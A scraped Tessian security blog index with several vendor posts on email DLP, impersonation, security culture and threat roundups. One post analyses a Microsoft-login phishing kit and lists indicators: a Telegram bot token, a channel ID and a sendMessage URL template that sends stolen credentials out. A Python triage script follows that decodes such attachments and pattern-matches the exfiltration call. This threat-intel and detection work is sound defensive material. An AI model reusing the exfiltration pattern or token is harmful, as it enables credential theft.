
Tessian Blog

Insider Risks, Email DLP
How Tessian Stops Your Data Leaving When Staff Do
by Andrew Webb Wednesday, January 11th, 2023
As our recent research revealed, 71% of security leaders told us that resignations increase security risks for their organization, and 45% said incidents of data exfiltration increased in 2022, as people took data when they left their jobs. As we head into 2023, the current economic climate coupled with restructuring in most sectors can only add to these concerns. There’s also the security strain felt by everyone who remains in the organization as they try to backfill roles and do their jobs under what might sometimes be difficult circumstances. Other challenges include users being more remote, security teams having too many incidents to investigate, and in the colder months – plain old flu.

Misdirected #email today (fortunately not at all sensitive – phew) driven by flu-brain 🤒 served as a near miss to remind me why the #security work being done by the team at @Tessian is so important — Sabrina Castiglione (@Castiglione_S) January 9, 2023

Tessian can help remedy insider risks such as these, both malicious exfiltration and accidental data loss, in several ways. Let’s deal with the malicious ones first. As an integrated cloud email security solution, Tessian comes with a variety of policies straight out of the box. Or you can design your own custom policies based on specific actions, teams or data points. 
For example, you might want a policy to flag for severe data exfiltration from staff who you know are leaving. Not only that, you can decide what action to take: simply track exfiltration attempts, warn the user, or require justification from their manager before releasing the email. Different teams might have different levels of controls; teams that handle highly sensitive information, like sales data, company code or IP, might have more sensitive controls than, say, marketing.

How to stop accidental data loss

Then of course there’s accidental data loss. Despite training and turning off auto-complete, accidental data loss remains a problem for organizations. According to our Psychology of Human Error report, two in five respondents (40%) have sent work emails to the wrong person. This isn’t just embarrassing, it can result in a loss of business. The same report found that nearly a third (29%) of businesses have lost a client or customer as a result of email recipient errors. Tessian can stop these misdirected emails too, providing in-the-moment alerts to warn users that something’s not quite right.

At Tessian, we’ve built a comprehensive and intelligent cloud email security platform that deploys in seconds via a single API. Using deep content inspection and your historical email data, Tessian forms a behavioral intelligence model that understands how your people use email. We know who they contact, what they send and receive, and what projects they’re working on. Simply put, we know when an incident occurs because we understand how your people usually behave.
Integrated Cloud Email Security
How to replace your Secure Email Gateway with an Integrated Cloud Email Security solution
by Andrew Webb Tuesday, December 13th, 2022
Here at Tessian we’ve built the world’s most comprehensive and intelligent cloud email security platform that deploys in minutes via a single API. But what does that ‘soup to nuts’ deployment look like? And when’s best to do it? Well someone who knows in detail is our Senior Sales Engineer, Tam Huynh. We caught up with him to hear how previous Tessian customers have done it in the past.
Briefly explain the history of Integrated Cloud Email Security

Integrated Cloud Email Security evolved because of the way Secure Email Gateways handle threats. Historically, you took a look at established data sets and threat signals. You have a static analysis which looks at the hashes of the file, or simply checks the reputation of that hash. Beyond that they may sandbox that hash to be able to do some behavioral analysis. But a lot of times with account takeovers and business email compromise today, there are no malicious payloads. ICES evolved to leverage behavioral intelligence or machine learning to analyze the threat signals or the data sets that are missed or ignored by secure email gateways.

So Tessian examines things like the unique writing styles between one person and another, looking for anomalies such as a sudden switch to a more formal salutation or sign off, or unusual IP address location. These are just some of the thousands of threat signals and variables Tessian can analyze.

How long does it take to deploy an Integrated Cloud Email Security solution?

The application programming interfaces (APIs) that Tessian uses have given us a way to be able to deploy advanced and intricate solutions to Microsoft 365 in around 20 minutes, depending on how quickly the administrator can get the author credentials. Users enter the credentials inside of our portal, and they grant permissions to the Tessian console, let us know which groups to sync, and they’re done.

If we look back a decade on how SEGs were deployed, it could take well over a month or more of multiple phase approaches, changing control windows, testing within a lab or a sandbox first, and then rolling over to production. This is much faster.

How does Tessian work with existing tech stacks as well as new ones?

So from what we’re seeing, many customers are looking to essentially replace their SEGs. So what we’ll typically do is a full feature map of their SEG, and then recommend a Microsoft 365 E5 license that allows them to be able to leverage features such as sandboxing and behavioral analysis as well as several other regular features that are found in a SEG. And if some clients choose to retain their SEGs and have 365 E5, that’s fine too.

For organizations not looking to move to Microsoft 365, who might have an on premise Exchange server, or are using G Suite, Tessian can leverage a gateway testing deployment, which means an install time of around an hour. And that’s from start to finish. Either way, deploying via the APIs or Gateway means no worrying about modifying MX records.

How should companies communicate ICES to the rest of the business?

So as we’ve seen you can deploy an ICES in under an hour, but that might come as a shock to other teams around the organization, so a clear communication strategy is as important as the technical deployment strategy.

You need to ensure all of the relevant teams have a heads up well ahead of time, especially the non-technical teams. For example, is this going to affect any imminent sales? Does the Customer Success team need to inform customers? Also don’t forget to let the leadership team know. Finally, use the skills of the comms team to help get the information out to the wider organization, and have them on standby in the rare case of there being an issue.

Finally, is there a right time to deploy an ICES?

Yes! Not at 5pm on the penultimate Thursday or Friday in the quarter when sales might be trying to hit target! The ideal time we’ve found with Tessian customers is after business hours on a Monday. The mail volume is down, so it wouldn’t be noticed by the end users.
Threat Stories
2022 Tessian Threat Intel Roundup: Social Engineering Threats Are Here to Stay
by Tessian Thursday, December 8th, 2022
As we close out the year, one thing is certain: Social engineering attacks will remain a mainstay for threat actors. The ease with which threat actors are able to exploit human vulnerabilities will find even the most secure organizations wanting. This is why, according to Tessian’s inaugural State of Email Security Report (2022), impersonation attacks are the number 1 concern for organizations globally. Only by adopting a defense-in-depth strategy will organizations be able to reduce the risk of falling victim to social engineering-based attacks.

In this final newsletter for the year we take a look at some of the dominant themes we’ve covered in 2022.

Sign up for our Threat Intel update to get this monthly update straight to your inbox.

Top Threat Intel Themes Covered in 2022

1. Phishing-as-a-Service Goes Mainstream

Phishing remains a persistent threat and security challenge. Phishing-as-a-Service offerings continue to evolve and proliferate on the dark web, reducing barriers to entry and effectively creating whole new armies of threat actors. Threat actors continue having significant success using phishing and business email compromise campaigns (BEC) to compromise organizations. This helps explain why social engineering attacks in the form of phishing and BEC are the top two costliest forms of a breach, topping out at $4.91 and $4.89 million, respectively.

2. Impersonation campaigns continue evolving

Earlier in the year we started tracking an increase in 3rd party impersonation campaigns that were leveraging PayPal to carry out invoice fraud. Other impersonation campaigns that came across the wire included threat actors targeting the legal sector – a sector that is disproportionately targeted by social engineering attacks. We’ve also found that obfuscation is the name of the game for malicious payload delivery. The continued persistence of brand impersonation campaigns is also cause for concern. In fact, the FTC reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021. We expect these trends to continue, evidenced by record breaking phishing activity in 2022, for the first time surpassing 1 million phishing attacks reported in a quarter.

3. The Unrelenting Scourge of Ransomware

One of the recurring themes we have been tracking is the nexus between ransomware and spear phishing attacks. Ransomware has proven to be a persistent security challenge with the rise of Ransomware-as-a-Service (RaaS) offerings. The increase in ransomware related damages – seeing a 57x increase from 2015 – is one of the main reasons driving up cyber insurance premiums, seeing increases of over 100% in the past 18 months. We expect nation-state and non-aligned threat actors to continue relying on ransomware and related extortion tactics, with email a key threat vector for payload delivery.

4. The rise, and rise, of credential compromises

Another trend we have been closely following is the increasing prevalence of credential related compromises. One such noteworthy adversary-in-the-middle (AiTM) compromise saw 10,000 organizations that use Microsoft targeted. Several large organizations have suffered credential related compromises, shining a spotlight on the fallibility of identity and access management (IAM) solutions in relation to the threat that social engineering poses. Credential compromise social engineering campaigns that target organizations using Microsoft 365 and Google Workspace collaboration software will remain a core focus area for threat actors going forward.

5. Event opportunism

As so often is the case, cyber criminals, the opportunists that they are, will attempt to exploit international and national events, including acts of war, pandemics and festive events. This reality was on full display at the start of the Russian invasion of Ukraine. We noted that over 70% of newly registered Ukraine themed domains were likely to be malicious. We expected a ramp-up of Russian cyber campaign activity in the wake of the Russian invasion of Ukraine, however this has failed to materialize. Effective public-private partnerships as demonstrated by Microsoft and others are part of the reason for the unprecedented level of cyber resilience by Ukraine and allied countries.

Concluding Thoughts & Recommended Actions

Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of social-engineering-related breaches be reduced. Utilizing best-in-breed cybersecurity solutions that have behavioral intelligence-based defensive capabilities, and that reinforce security culture strengthening like Tessian, is increasingly essential to address an ever-evolving social engineering threatscape.

Until next year, stay safe and stay secure.
Email DLP, Advanced Email Threats
How Tessian stops Impersonation Attacks
by Andrew Webb Friday, December 2nd, 2022
Every cyber attack that gets through hurts your organization’s staff, but impersonation attacks are particularly damaging to the individual who’s targeted. In this example, we see how Tessian can stop these types of attacks and protect staff so they can do their best work. 
While attackers will target almost anyone in an organization to gain access, teams in areas closest to the money – namely the finance team – are often the most at risk. Finance teams handle hundreds of invoice payments a month, and are responsible for your organization’s cash flow. And when it comes to payroll they interact with every other employee in the company. This is why they represent high value targets to attackers.

There are four types of impersonation: multi-persona, brands, individuals, and vendors. We’ll look at the last one – vendors – in this example. You can see how the Tessian Cloud Email Security Platform has flagged this email to Calvin in the finance team asking for an invoice payment. OSINT tools and the victim organization’s own blog and social media might reveal a typical third party that they’ve worked with; in this fictitious example, it’s a supplier called Darkhill Health.

There are several reasons why Tessian has flagged this as a potential impersonation attempt and stopped it from reaching Calvin’s inbox. Let’s look at them in more detail.

Firstly, examination of the sender’s domain reveals the letter i in @darkhill-health has been replaced with the number 1.

Furthermore, we can see there is an unusual display name, Philip Davis rather than the typical Philip J Davis found in other emails from Darkhill Health.

There’s also a fake use of the RE: reply in the subject line, giving the impression that this is part of a sequence of email exchanges, even though it’s the first email in the chain from this fake domain.

Finally, and this is one of the hardest things for legacy solutions to determine, there is suspicious financial intent as the sender is requesting updated payment details.

Our own State of Spear Phishing report shows that the most successful attacks happen just after lunch, or towards the end of the working day, when people are at their most distracted. This email was sent at 5:16pm on a Thursday with just the right sense of urgency, and you can see how your employees could easily fall victim to this type of attack.

How Tessian stops these attacks

Tessian utilizes behavioral intelligence to gain a deeper understanding of each internal and external relationship. Using deep content inspection, as well as your historical email data, Tessian forms a behavioral intelligence model that understands how your people use email within the organization. It knows who they contact, what they send and receive, and what projects they’re working on. This advanced behavioral intelligence sits in a single cloud-based email security platform protecting your organization from both advanced incoming threats like the one above AND also stopping sensitive data leaving the organization.

All of this means this attack is stopped dead in its tracks, and never reaches Calvin’s inbox, so he can carry on with his day.
Book Recommendations for Security Professionals
by Adrian Jozwik Wednesday, November 30th, 2022
Looking for some summer reading? We’ve pulled together a little reading guide for when you get some well-earned downtime. We asked around the Tessian offices for recommendations for good reads in the tech and security space. Here are the team’s recommendations.

Cyber Privacy: Who Has Your Data and Why You Should Care
April Falcon Doss
Amazon, Google, Facebook, governments. No matter who we are or where we go, someone is collecting our data: to profile us, target us, assess us; to predict our behavior and analyze our attitudes; to influence the things we do and buy — even to impact our vote.

The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats
Richard A. Clarke
“Great book on the challenges of cyberwarfare policy” – Paul Sanglé-Ferrière, Product Manager, Tessian.
An urgent new warning from two bestselling security experts – and a gripping inside look at how governments, firms, and ordinary citizens can confront and contain the tyrants, hackers, and criminals bent on turning the digital realm into a war zone.

The Wires of War: Technology and the Global Struggle for Power
Jacob Helberg
From the former news policy lead at Google, an urgent and groundbreaking account of the high-stakes global cyberwar brewing between Western democracies and the autocracies of China and Russia that could potentially crush democracy.

This Is How They Tell Me the World Ends: The Cyberweapons Arms Race
Nicole Perlroth
Filled with spies, hackers, arms dealers, and a few unsung heroes, written like a thriller and a reference, This Is How They Tell Me the World Ends is an astonishing feat of journalism. Based on years of reporting and hundreds of interviews, The New York Times reporter Nicole Perlroth lifts the curtain on a market in shadow, revealing the urgent threat faced by us all if we cannot bring the global cyber arms race to heel.

The Art of Invisibility: The World’s Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data
Kevin Mitnick & Robert Vamosi
In The Art of Invisibility Mitnick provides both online and real life tactics and inexpensive methods to protect you and your family, in easy step-by-step instructions. He even talks about more advanced “elite” techniques, which, if used properly, can maximize your privacy.

The Cuckoo’s Egg
Clifford Stoll
“Probably the original threat actor report – so good” – Matt Smith, Software Engineer at Tessian
In 1986, Clifford Stoll – a systems administrator at the Lawrence Berkeley National Laboratory – wrote this book. Based on his field notes, this is arguably one of the first documented cases of a computer hack and the subsequent investigation, which eventually led to the arrest of Markus Hess. It’s now considered an essential read for anyone interested in cybersecurity.

CISO Compass: Navigating Cybersecurity Leadership Challenges with Insights from Pioneers
Todd Fitzgerald
While this book covers all the fundamentals of IT security governance and risk management, it also digs deeper into people. After all, being a CISO isn’t just about technology. The insights in the book come directly from CISOs. In total, 75 security leaders contributed to the book, which means there’s plenty of actionable advice you can apply to your strategies. Looking for more insights from security leaders? Check out Tessian’s CISO Spotlight series.

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers
Andy Greenberg
Politics play a big role in cybercrime. This book is focused on Sandworm, the group of Russian hackers who, over the last decade, has targeted American utility companies, NATO, and electric grids in Eastern Europe and paralyzed some of the world’s largest businesses with malware. But the author, Wired senior writer Andy Greenberg, also provides plenty of background on both the technology and the relationships between various countries.

Cult of the Dead Cow
Joseph Menn
Cult of the Dead Cow is the tale of the oldest, most respected, and most famous American hacking group of all time. Though until now it has remained mostly anonymous, its members invented the concept of hacktivism, released the top tool for testing password security, and created what was for years the best technique for controlling computers from afar, forcing giant companies to work harder to protect customers. Cult of the Dead Cow explores some of the world’s most infamous hacking groups – particularly the cDc – and explains how technology, data, and – well – the world has changed because of them.

The Making of a Manager: What to Do When Everyone Looks to You
Julie Zhuo
Congratulations, you’re a manager! After you pop the champagne, accept the shiny new title, and step into this thrilling next chapter of your career, the truth descends like a fog: you don’t really know what you’re doing.

CISM Certified Information Security Manager All-in-One Exam Guide
Yes, this is an exam guide…and yes you should add it to your reading list. If nothing else, to have on-hand as a reference. Why? It covers everything. Security governance, risk management, security program development, and security incident management. Curious as to whether or not other security professionals have their CISM certification? We interviewed 12 women about their journeys in cybersecurity. Read their profiles here and the full report, Opportunity in Cybersecurity Report 2020.

The health benefits of reading

Whatever you choose to read these holidays, the health benefits of reading are well documented. As our Lost Hours report revealed, many CISOs aren’t taking time out from their jobs to de-stress and unwind. So make sure you schedule a little you time with a good book.
Remote Working
1 in 3 Employees Do Not Understand the Importance of Cybersecurity
by Andrew Webb Saturday, November 26th, 2022
Our research report into security culture reveals a startling disconnect between security leaders’ views and those of employees when it comes to cybersecurity. Our survey of 2,000 employees in the UK and US revealed that just 39% say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, over two-fifths (42%) of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t care enough about cybersecurity to mention it – a sentiment that should set alarm bells ringing for security leaders.  What’s more, for some staff, this attitude is bleeding into their home life. 20% of employees say they don’t care about cybersecurity at work – over 1 in 10 say they don’t care about it in their personal lives! It’s clear then, that a significant percentage of employees are simply not engaged with the organization’s cybersecurity procedures and how they play their part in keeping their company secure.
Turning to IT and security leaders, virtually all of the 500 leaders we surveyed (99%) agreed that a strong security culture is important in maintaining a strong security posture. And yet despite rating their organization’s security 8 out 10, on average, three-quarters of organizations experienced a security incident in the last 12 months.  There’s clearly a disconnect here between the views of the SOC team, and those in other teams around the business, and one reason for that could be the reliance on traditional training programs. 48% of security leaders say training is one the most important influences on building a positive security posture. But the reality is that employees aren’t engaged; just 28% of UK and US workers say security awareness training is engaging and only 36% say they’re paying full attention. Of those who are, only half say it’s helpful, while another 50% have had a negative experience with a phishing simulation. 1 in 5 employees don’t even show up for SAT sessions.  As indicated above, the report also reveals a disconnect when it comes to actually reporting security risks and incidents. Eighty percent of security leaders believe robust feedback loops are in place to report incidents, but less than half of employees feel the same, suggesting clearer processes are needed so that security teams have greater visibility of risk in their organization.
Boomers v Gen Z: The Generational Divide
The report also revealed stark generational differences when it comes to cybersecurity culture perceptions. The youngest generation (18-24 year olds) is almost three times as likely to say they’ve had a negative experience with phishing simulations when compared to the oldest generation (55+). In contrast, older employees are four times more likely to have a clear understanding of their company’s cybersecurity policies compared to their younger colleagues, and are five times more likely to follow those policies. When it comes to risky cybersecurity practices such as reusing passwords, exfiltrating company data and opening attachments from unknown sources, younger employees are the least likely to see anything wrong with these practices.
Threat Stories
“No Pain No Gain” Impersonation Campaign – Sending Stolen Credentials to Telegram Group
by Catalin Giana Thursday, November 10th, 2022
The Tessian Threat Intel team discovered a new Microsoft impersonation campaign in the wild called “No Pain No Gain.” The campaign utilizes a Telegram API call to harvest credentials to a malicious chat group on the messaging platform – a common tactic that was first identified last year. The threat actors also relied on heavily encoding the malicious attachment.
Read further to see how we reviewed the attachment, and the steps we took to de-obfuscate it. We also show what the harvested credentials look like when received by the Telegram BOT API.
The victim receives an email with an HTML attachment called Setup Outlook-mail.html. Upon opening it you are redirected to a page that impersonates Microsoft’s login, with the victim’s email address already embedded in the page.
[Figure: Impersonated Microsoft login page]
This is not impressive at this point: at face value it appears to be a run-of-the-mill impersonation campaign that has been seen before. Where it gets interesting is that, upon inspecting the HTML page, it is apparent that great effort was taken to obfuscate the code.
Decoding the HTML attachment
[Figure: Obfuscated code]
Step 1
The HTML page contains multiple layers of obfuscation that needed to be removed manually in order to reveal the original content. After escaping all the javascript-encoded characters we were left with a more readable script.
[Figure: Code snippet before base64 decoding]
Step 2
In order to reveal the actual HTML script we had to decode the string found in the data variable, which turned out to be base64 encoded. After another step of decoding and beautifying, we found the readable HTML code.
[Figure: Decoded data variable]
Outcome
All the magic can be found in the code snippet above. What is unique about this campaign is that instead of using a command and control server to store the stolen data, it uses the Telegram API to send it to a malicious chat group on the messaging platform. The stolen information contains usernames and passwords that can be used to compromise Microsoft email accounts. The sent message also has the geolocation of the victim and the User-Agent that was used.
Telegram testing with our own channel
We created a Telegram chat group for testing purposes to see exactly how the stolen data, i.e. the credentials, are harvested and sent out via the Telegram API (see graphic below). Using an impersonated Microsoft login page, the threat actors prompt the victim for a password. This triggers a pop-up message indicating that the first password entered is incorrect or too short. The victim is then prompted to submit a second password, which then appears to be a successful log-in.
In addition to the credentials, the collected data includes the victim’s IP address, obtained by using the ip-api.com service. All the stolen data is stored in the malicious Telegram chat group in the format below.
[Figure: Example of harvested credentials message]
When we used the getChat endpoint, we received the response below from the malicious Telegram group chat. We were able to identify the group ID, the group name and determine that the channel is private.
[Figure: Group ID]
We were also able to determine that the malicious Telegram group chat has two members.
[Figure: Group Members]
After further investigation we were unable to access the contents of the Telegram chat group due to privacy and security settings set by the threat actors. We based this determination on the fact that the value of the parameter “can_read_all_group_messages” is set to “False”.
[Figure: Privacy Settings]
Indicators
Here is a table of indicators that can be filtered or searched on in your logs for any potential past leaks, or signals for any attempts.

Object | Indicator
Telegram Bot ID | 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk
Telegram Channel ID | 5748272550
Email Attachment Filename [T1598.002] | Setup Outlook-mail.htm, Setup Outlook-mail.html
Starting Text | <script>var emai\u006c=”
Telegram API Exfiltration [T1071.001] | https://api[.]telegram[.]org/bot$botid_value/sendMessage?chat_id=$channel&text=$credentials

$botid_value = the value that Telegram BotFather provides for the bot: 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk
$channel = the value of the channel at Telegram: 5748272550
$credentials = the data that is being sent to Telegram and the fraud channel hosted there
Conclusions and Recommendations
• Don’t open attachments from unknown sources, especially if you weren’t expecting an Invoice/Outlook Setup/Resume etc.
• If you opened an attachment and you are still unsure, please send it to your security team for review.
• Ensure that your organization utilizes an intelligent email security solution that can prevent and detect advanced impersonation campaigns.
• If you have security experience, you can open the HTML page in a text editor before running it. If it’s highly obfuscated, as in the first screenshot above, there is a high possibility that it is malicious.
Additionally the US Cybersecurity and Infrastructure Security Agency (CISA) offers useful advice for staying safe as well as a list of free cybersecurity tools:
The UK’s National Cyber Security Centre (NCSC) also offers useful guidance for staying safe:
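The two decoding steps and the Telegram exfiltration indicator described in this post can be combined into a static triage check for HTML attachments, which matters because a plain-text search of the raw attachment misses the encoded URL. The Python below is an added example, not Tessian's tooling; the function names, the 40-character base64 threshold and the embedded sample (inert markup with a placeholder token) are assumptions made for illustration.

```python
import base64
import re

# Indicator from the table above: a Telegram Bot API sendMessage call.
TELEGRAM_EXFIL = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d+):[\w-]+/sendMessage", re.IGNORECASE)
# JavaScript \uXXXX and \xXX escapes (the encoded characters removed in Step 1).
JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
# Candidate base64 strings; the 40-character minimum is an assumed threshold.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
GEO_LOOKUP = "ip-api.com"  # IP lookup service named in the post


def unescape_js(text):
    """Step 1: resolve JavaScript character escapes into plain characters."""
    return JS_ESCAPE.sub(
        lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_layers(text, max_depth=5):
    """Step 2: peel base64 layers. Returns all layers, outermost first."""
    layers = [unescape_js(text)]
    for _ in range(max_depth):
        decoded = []
        for run in B64_RUN.findall(layers[-1]):
            try:
                padded = run + "=" * (-len(run) % 4)
                raw = base64.b64decode(padded, validate=True)
                decoded.append(raw.decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                continue  # not base64, or not text once decoded
        if not decoded:
            break
        layers.append(unescape_js("\n".join(decoded)))
    return layers


def triage(html):
    """Report what each decoded layer of an HTML attachment reveals."""
    layers = decode_layers(html)
    bot_ids = []
    geo = False
    for layer in layers:
        for match in TELEGRAM_EXFIL.finditer(layer):
            # Keep only the numeric prefix of the token for log searches.
            if match.group("bot_id") not in bot_ids:
                bot_ids.append(match.group("bot_id"))
        geo = geo or GEO_LOOKUP in layer
    return {
        "layers": len(layers),
        "escaped_chars": len(JS_ESCAPE.findall(html)),
        "telegram_bot_ids": bot_ids,
        "geo_lookup": geo,
        "suspicious": bool(bot_ids),
    }


def build_sample():
    """Constructed sample: placeholder token, no form or submission logic."""
    inner = ('<html><!-- constructed sample --><script>'
             'var u="https://api.telegram.org/bot0000000000:'
             'PLACEHOLDER_TOKEN/sendMessage";'
             'var g="http://ip-api.com/json";</script></html>')
    encoded = base64.b64encode(inner.encode("utf-8")).decode("ascii")
    outer = ('<script>var email="user@example.com";'
             'var data="%s";document.write(atob(data));</script>' % encoded)
    # Mirror the "Starting Text" indicator: one escaped character in "email".
    return outer.replace("email", "emai\\u006c")


if __name__ == "__main__":
    sample = build_sample()
    print("raw text contains Telegram URL:", "api.telegram.org" in sample)
    for key, value in triage(sample).items():
        print(key, "=", value)
```

The numeric bot ID returned by `triage` is the value to pivot on when searching proxy or DNS logs for the `sendMessage` request listed in the indicators table.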
Life at Tessian
A fresh new look for a world in need of Intelligent Cloud Email Security
by Adrian Jozwik Wednesday, November 9th, 2022
When you visit Tessian’s website, download a piece of content or see our social media channels you will notice something different. We have redesigned our brand with one thing in mind, our customers. We have focused our brand to reflect what we do best and that is to protect you and your people. At Tessian, we understand the importance of helping you protect your organization from advanced cyber threats such as business email compromise ransomware while also ensuring we stop insider risks, whether accidental or malicious over email. We place this responsibility in the highest regard.
Intelligence at the very core
With all of this in mind, we wanted to create a brand that reflects the trust you place in us and is guided by the values we at Tessian represent. A brand that is:
• At the highest degree of Intelligence, where we focus on high value security technology that solves hard problems
• Customer centric because we know you and your people need intelligent technology that is focused on protecting, together.
• On the front line of intelligently protecting organizations and users with the latest in technology.
The Tessian Cloud Email Security Platform utilizes unparalleled behavioral intelligence to stop the attacks that could hurt you the most. Tessian prevents attacks from coming into the inbox while protecting against intentional and accidental data loss over email by leveraging behavioral intelligence modeling. Because of this deep behavioral understanding, we can predict the right decisions each person should make when interacting with email and intervene to protect your users and your organization from email-based threats.
Because Intelligence comes in all shapes and sizes
Tessian’s brand had to represent not only the high levels of intelligence our products offer but also represent the people that interact with our products.
The visual language we have created is more serious, more aligned with the industry we’re in, and gives a clear message of how our products work to protect you. We have delivered a new look and feel and a website to reflect our primary focus. We want our customers and partners to be able to find and recognize Tessian when they need to. For Tessian to break through the noise, it was time to come out of our shell and emphasize the capabilities we provide and the values we stand for. Make no mistake, our technology is differentiated and complete – Cloud Email Security which is unmatched at protecting you against cyber attacks, bar none.
Taking a deeper look
A large part of any brand is the visual identity it encapsulates for the company, and the way its products are perceived by those who experience it. We wanted to achieve a brand that was ‘FWD:Thinking’ (also the name of our recent security summit), reflecting the ever changing attack landscape our customers live in and one that stays front of mind for those that we protect.
We started by looking at the foundations of our new brand. The most important part was to ensure we could communicate our solutions through our imagery. We decided to utilize hexagons for two reasons: Firstly they convey strength. Secondly, Tessian is built on six values; each side represents one of our values. Placing a person behind a frosted glass demonstrates the true nature of how our solutions work, keeping you safe from cyberattacks and keeping attackers at bay. The same tile allows Tessian to see right through and see the attacks which otherwise would have been hidden from view. Furthermore, we often combine this visual device with an example of a suspect email, demonstrating how our behavioral intelligence sees its true nature. Various triggers are called out as Tessian identifies and analyzes behaviors and highlights threat signals, coming together to drive an unparalleled level of intelligence.
You will also see customer iconography across our new website and assets. Each icon represents different areas of the product from behavioral intelligence to preventative capabilities. Each icon holds its own place in telling the Tessian story.  
Darker tones and more harmonious colors are now utilized in our new color palette. We wanted a color palette that you can relate to while feeling assured, yet also colors that appear serious but still approachable. We can distinguish between good and bad by using a straightforward red and blue combination, which we will then emphasize with a simple white and gray background. Finally, the keen eyed among you might even notice a subtle difference in our logo. While we wanted to keep the identity our logo gives us, we also wanted it to reflect the sharpness we have in detecting and preventing cyber-attacks.
Our mission to Secure the Human Layer
Gartner stated in the 2021 Market Guide for Email Security that customers are now looking for solutions that integrate directly into cloud email via an API, rather than as a gateway and that a behavioral approach is needed for both threat protection and data protection on email. That’s why we’re building intelligent security that works for human beings as they are, not how security policies would like them to be. Using machine learning technology, Tessian automatically predicts and eliminates advanced threats on email caused by human error – like data exfiltration, accidental data loss, business email compromise and phishing attacks – with minimal disruption to employees’ workflow. As a result, employees are empowered by security. Our new brand encompasses our mission and approach to security; however, since the company started we have never shied away from the hard problems to solve. We put our customers’ problems at the heart of everything we do and intelligently solve them.
Threat Stories, Advanced Email Threats
Tessian Threat Intel Roundup: Advanced Phishing Attacks
by Monday, October 31st, 2022
On the back of Cybersecurity Awareness Month in October 2022 with key recommendations to protect against phishing attacks, we delve deeper into the latest Phishing-as-a-Service offering known as Caffeine, first identified by Mandiant. We also unpack an impersonation campaign we identified in the wild called Logokit. And in other notable news, a misconfigured Microsoft endpoint storage vulnerability dubbed BlueBleed was exposed by researchers at SOCRadar, potentially exposing sensitive data for thousands of customers. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.
• Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web.
• The commercialization of these PhaaS exploit kits and threat actors’ services are removing the barriers to entry for carrying out attacks, at scale.
• The most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against Microsoft 365 targets.
• Tessian Threat Intel recently identified a Business Email Compromise (BEC) campaign in the wild called Logokit.
• Logokit uses randomized spoofed pages and brand logos for purposes of harvesting login credentials. In one instance we found that a spoofed version of a Microsoft login page was being used in an attempt to capture credentials.
• Researchers from SOCRadar identified six misconfigured Azure buckets which it has dubbed BlueBleed.
• The BlueBleed exposure according to SOCRadar is among the most significant B2B leaks ever, exposing sensitive data of 65,000 entities across 111 countries.
• Microsoft immediately rectified the privacy settings on the exposed buckets, thanking SOCRadar, however disputing the extent of the exposure.
Phishing remains a persistent threat and security challenge. Threat actors continue having significant success using social engineering attacks to compromise organizations. And there is no silver bullet to protect against social engineering attacks.    Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of a social-engineering-related breach be reduced. Utilizing a best-in-breed solution that has advanced social engineering defense capabilities and that reinforces security culture strengthening like Tessian is increasingly essential to address an ever-evolving threatsc
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Interviews With CISOs
Watch Again: Fwd: Thinking – The Intelligent Security Summit
by Andrew Webb Thursday, October 27th, 2022
If you missed Fwd: Thinking – The Intelligent Security Summit, don’t worry. We have every session available on demand right here. You can also watch past sessions of previous Tessian summits over on our knowledge hub.
Five Email Security Stats You Don’t Already Know (But Wish You Did)
The summit kicked off with Tessian’s John Filitz in conversation with Ram Ganeshanathan — VP of Enterprise Security at Arm, and Anuj Tewari, CISO at TMF Group. Together they discussed the findings from our latest State of Email Security Report, comprising global research into email security trends for 2022. The panel then revealed where your focus should be as we head toward 2023.
The Growing Threat of Impersonation and Account Takeover Attacks
Impersonation and Account Takeover (ATO) attacks are the leading threat vectors that result in Business Email Compromise (BEC) and represent among the greatest cybersecurity threats to enterprises. In this session, Tessian’s Paul Laudanski is joined by David Kennedy – CEO and Ethical Hacker at TrustedSec, James Fernley – Head of IT Security, BDO UK, and Jason Thomas — CIO, Cole, Scott and Kissane for a lively discussion on the growing threat of account takeover attacks, and how to mitigate them.
Making the Case for Cybersecurity Spend?
What’s the risk really worth? We need to talk about risk. And you can’t talk about risk without talking about spending. It’s a fact that as companies think about growing efficiently, security is often bumped down the agenda. Nate Tombs, CISO at Man Group, Marco Garcia, Field CTO at Torq and Tessian’s Josh Yavor explore how to prioritize cyber risk as a business risk and explain how to demonstrate ROI so that all business leaders can speak the same language and avoid that worst case scenario.
Isn’t Security Everyone’s Responsibility?
Fact: Your end users don’t really care about cybersecurity.
Our recent Security Cultures report found that 1 in 3 workers do not think they play a role in maintaining their company’s cybersecurity posture while only 36% say they’re paying full attention to security awareness training. Ash Hunt – Group Head of Information Security at Sanne Group, Imraan Dawood – Information Security Officer, Investec and Tessian’s Kim Burton take a look at why this is and what a better approach to building a stronger security culture looks like.
Lessons Learned on the journey to a Machine Learning Platform
Tessian is built on machine learning and artificial intelligence. In this session, Daniel Linder — Senior Director of Data Science at Tessian, takes you on the journey of building a Machine Learning system in the InfoSec world. You’ll also get to peek behind the curtain into building and scaling a team of data scientists and engineers, as well as some practical tips on how to apply machine learning in ways that are most impactful now, and not in 10 years’ time.
How to Survive and Thrive in Cybersecurity
